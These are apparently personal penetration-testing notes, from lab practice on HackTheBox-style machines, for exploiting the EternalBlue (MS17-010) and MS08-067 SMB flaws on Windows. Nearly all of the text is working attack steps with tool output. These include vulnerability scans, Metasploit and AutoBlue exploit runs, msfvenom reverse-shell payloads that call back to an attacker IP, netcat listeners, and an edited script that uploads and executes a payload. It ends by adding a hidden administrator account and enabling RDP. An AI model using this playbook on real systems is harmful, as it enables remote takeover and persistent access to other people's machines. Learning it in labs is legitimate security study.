Eternal Blue

REF:

nmap

---------------------
nmap search and test:

PORT     STATE  SERVICE
139/tcp  open   netbios-ssn
445/tcp  open   microsoft-ds

> grep smb /usr/share/nmap/scripts/
.. smb-vuln-ms08-067.nse

> nmap --script vuln
> nmap --script smb-vuln $IP -Pn -p 445
> nmap --script smb-vuln* $IP -p 139,445
> nmap --script smb-vuln-ms08-067 $IP -Pn -p 445
> nmap --script smb-vuln-ms17-010 $IP -sV -p 445

Host script results:
| smb-vuln-ms08-067: 
| smb-vuln-ms17-010
|   VULNERABLE:
|   Microsoft Windows system vulnerable to remote code execution (MS08-067)
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2008-4250
|     IDs:  CVE:CVE-2017-0143

Eternal Checker

git clone https://github.com/3ndG4me/AutoBlue-MS17-010.git
cd AutoBlue

> python3 eternal_checker.py $IP
[*] Target OS: Windows 5.1
[!] The target is not patched  .. Vulnerable!!!

Eternal Blue - Metasploit

> sudo msfconsole
> search ms08-067
> search ms17-010  ..better

set payload windows/x64/meterpreter/reverse_tcp
use ms08_067_netapi
use ms17_010_eternalblue  ..better
set rhost $IP
set lhost $MyIP
show options
exploit

meterpreter > cd C:\Documents and Settings\john\Desktop 
meterpreter > cat user.txt
Flag !!!

AutoBlue - Metasploit

-----------------------------------
Prep: 
cd shellcode
./shell_prep.sh 

Auto generate a reverse shell with msfvenom? (Y/n) Y
LHOST for reverse connection   : 10.10.14.128
LPORT you want x64 to listen on: 4444
LPORT you want x86 to listen on: 6666
Type 0 for meterpreter shell 1 for regular cmd shell: 1
Type 0 staged payload or 1 for stageless payload    : 0

Generating x64 cmd shell (staged)...
msfvenom -p windows/x64/shell/reverse_tcp -f raw -o sc_x64_msf.bin EXITFUNC=thread LHOST=10.10.14.128 LPORT=4444
Saved as: sc_x64_msf.bin

Generating x86 cmd shell (staged)...
msfvenom -p windows/shell/reverse_tcp -f raw -o sc_x86_msf.bin EXITFUNC=thread LHOST=10.10.14.128 LPORT=6666
Saved as: sc_x86_msf.bin

MERGING SHELLCODE WOOOO!!!
DONE

-----------------------------------
Listener:

> ../listener_prep.sh 

LHOST for reverse connection    : 10.10.14.128
LPORT for x64 reverse connection: 4444
LPORT for x86 reverse connection: 6666
Enter 0 for meterpreter shell or 1 for regular cmd shell: 1
Type 0 for staged payload or 1 for a stageless payload  : 0

Metasploit Starts:
Starting listener (staged)...
Starting postgresql (via systemctl): postgresql.service==== AUTHENTICATING FOR org.freedesktop.systemd1.manage-units ===
       =[ metasploit v5.0.88-dev                          ]
+ -- --=[ 2014 exploits - 1097 auxiliary - 343 post       ]
+ -- --=[ 562 payloads - 45 encoders - 10 nops            ]
+ -- --=[ 7 evasion                                       ]
[*] Processing config.rc for ERB directives.
resource (config.rc)> use exploit/multi/handler
resource (config.rc)> set PAYLOAD windows/x64/shell/reverse_tcp
resource (config.rc)> set LHOST 10.10.14.128
resource (config.rc)> set LPORT 4444
resource (config.rc)> set ExitOnSession false
resource (config.rc)> set EXITFUNC thread
EXITFUNC => thread
resource (config.rc)> exploit -j
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
[*] Started reverse TCP handler on 10.10.14.128:4444 
resource (config.rc)> set LPORT 6666
resource (config.rc)> exploit -j
[*] Exploit running as background job 1.
[*] Exploit completed, but no session was created.
[*] Started reverse TCP handler on 10.10.14.128:6666 

msf5 exploit(multi/handler) > jobs

Jobs
====

  Id  Name                    Payload                        Payload opts
  --  ----                    -------                        ------------
  0   Exploit: multi/handler  windows/x64/shell/reverse_tcp  tcp://10.10.14.128:4444
  1   Exploit: multi/handler  windows/shell/reverse_tcp      tcp://10.10.14.128:6666

------------------------------------
Was there another command to run? (I dont remember)

Connected!

Shellprep, AutoMerge, Netcat: Exploit7

Shell Prep, AutoMerge, listen with Netcat

./shell_prep.sh
Y
ip
4444
5555
reg cmd shell: 1
stageless payload: 1
32/64 generated, merged!!!

nc -lvnp 4444
nc -lvnp 5555  ..2 listeners

python eternalblue_exploit7.py $IP ./AutoBlue-MS17-010/shellcode/sc_all.bin

AutoBlue - No MSF - zzz_exploit.py

  • Needs: mysmb.py

  • If you are lucky, this might work without custom payload

  • Needs to have pipe known/exposed and guest/anonymous

  • Ex: legacyHTB..worked blueHTB..failed

> python3 zzz_exploit.py $IP

[*] Target OS: Windows 5.1
[+] Found pipe 'browser'             ..pipe was known
[+] Using named pipe: browser
Groom packets
attempt controlling next transaction on x86
success controlling one transaction
modify parameter count to 0xffffffff to be able to write backward
leak next transaction
CONNECTION: 0x820f3240
SESSION: 0xe10855a8
FLINK: 0x7bd48
InData: 0x7ae28
MID: 0xa
TRANS1: 0x78b50
TRANS2: 0x7ac90
modify transaction struct for arbitrary read/write
[*] make this SMB session to be SYSTEM
[+] current TOKEN addr: 0xe2148030
userAndGroupCount: 0x3
userAndGroupsAddr: 0xe21480d0
[*] overwriting token UserAndGroups
[*] have fun with the system smb session!
[!] Dropping a semi-interactive shell (remember to escape special chars with ^) 
[!] Executing interactive programs will hang shell!

C:\WINDOWS\system32>whoami  ..system

Exploit7 - No MSF - Manual Merge

nasm -f bin ./shellcode/eternalblue_kshellcode_x64.asm -o ./sc_x64_kernel.bin
msfvenom -p windows/x64/shell_reverse_tcp lport=443 lhost=$IP --platform windowx -a x64 --format raw -o sc_x64_payload.bin EXITFUNC=thread
cat sc_x64_kernel.bin sc_x64_payload.bin > sc_x64.bin

nasm -f bin ./shellcode/eternalblue_kshellcode_x86.asm -o ./sc_x86_kernel.bin
msfvenom -p windows/shell_reverse_tcp lport=443 lhost=$IP --platform windowx -a x86 --format raw -o sc_x86_payload.bin EXITFUNC=thread
cat sc_x86_kernel.bin sc_x86_payload.bin > sc_x86.bin

python3 ./shellcode/eternalblue_sc_merge.py sc_x86.bin sc_x64.bin sc_all.bin

python3 eternalblue_exploit7.py $IP sc_all.bin
nc -nlvp 443
whoami ..system

AutoBlue - No MSF - zzz_exploit.py - Named Pipes

Payload
msfvenom -p windows/shell_reverse_tcp lhost $MyIP lport 4444 -f exe > exploit.exe

vi zzz_exploit.py
USERNAME = '//'                           .. Anonymous authentication
PASSWORD = ''                             .. User/Pass if you have one
print('creating file c:\\exploit.exe on the target')
fid2 - smbConn.createFile(tid2, '/exploit.exe')
smb_send_file(smbConn, '/full/path/exploit.exe', 'C', '/exploit.exe')
service_exec(conn, r'cmd /c c:\exploit.exe')

nc -nvlp 4444
python zzz_exploit.py
python zzz_exploit.py <ip> [pipe_name]
python zzz_exploit.py 10.x.x.x            .. pipe Problem

msfconcole                                .. not allowed for OSCP
search pipes                              .. get pipe_name
use 0  
use auxiliary/scanner/smb/pipe_auditor
options
set rhosts 10.x.x.x
run
\samr \ntsvcs \lsass \netlogon \browser   .. found Pipes

python zzz_exploit.py 10.x.x.x samr    
nc -nvlp 4444
C:\WINDOWS\system32>whoami                .. system

RDP Trick

C:\WINDOWS\system32>net user
C:\WINDOWS\system32>net user mikes hacks /add
C:\WINDOWS\system32>net localgroup administrators mikes /add

Allow Remote Access:
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f

Kali:
> sudo apt-get update
> sudo apt-get install rdesktop
> rdesktop -u mike -p hacks legacy
PreviousEmail SMTPNextFTP

Last updated